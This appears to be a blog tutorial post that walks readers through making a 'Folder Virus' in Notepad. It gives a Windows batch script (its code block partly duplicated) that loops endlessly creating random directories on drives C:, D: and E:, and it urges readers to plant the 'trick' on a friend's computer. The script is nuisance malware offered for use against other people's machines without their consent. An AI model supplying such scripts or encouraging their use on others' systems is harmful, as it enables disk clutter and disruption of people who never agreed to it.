Steps to create a Folder Virus using Notepad:
1: Open Notepad: Open notepad from [Start >> Run >> Type “Notepad” and press Enter. Copy the below code in Notepad:
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in
2: Save the file: Now save the file as Virus.bat in your desktop. Just click Save as and save it as File name: Virus.bat and File Type: All Files.
You have successfully created a Folder virus using notepad. You can copy this trick in your friend’s computer and wait for his reaction. You can stop this virus by siimply restarting the system.
No comments:
Post a Comment